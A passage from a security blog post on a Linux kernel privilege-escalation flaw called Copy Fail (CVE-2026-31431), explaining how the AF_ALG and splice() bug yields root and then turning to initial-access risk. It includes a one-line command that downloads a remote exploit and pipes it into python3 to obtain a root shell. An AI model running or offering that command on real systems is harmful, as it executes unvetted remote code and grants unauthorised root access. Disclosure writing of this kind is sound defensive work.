Copy Fail is 732 bytes. Your foothold problem is the bigger one.

DEV Community·Christopher Karatzinis·about 1 month ago
#security #linux #devops #sysadmin #copy #fail

CVE-2026-31431 dropped this week. The disclosure site is at copy.fail and the writeup is short enough to read with coffee.

The TL;DR: a logic flaw in the kernel's authencesn path, reachable through AF_ALG sockets, abused via splice() to land a 4-byte write into the page cache of any setuid binary. They picked /usr/bin/su for the demo.

The whole exploit is 732 bytes of Python 3 standard library. No race window. No kernel offsets. Reliable across every affected distro from 2017 onward.

Quick run:

    $ curl https://copy.fail/exp | python3 && su
    #

Root shell. The kernel hands it over because AF_ALG is on by default and authencesn does the wrong thing under splice().

The bit nobody is talking about

Copy Fail is a local privilege escalation. The attacker still needs an unprivileged shell on your box to fire it.

So where does that shell come from? Same place it always does.…
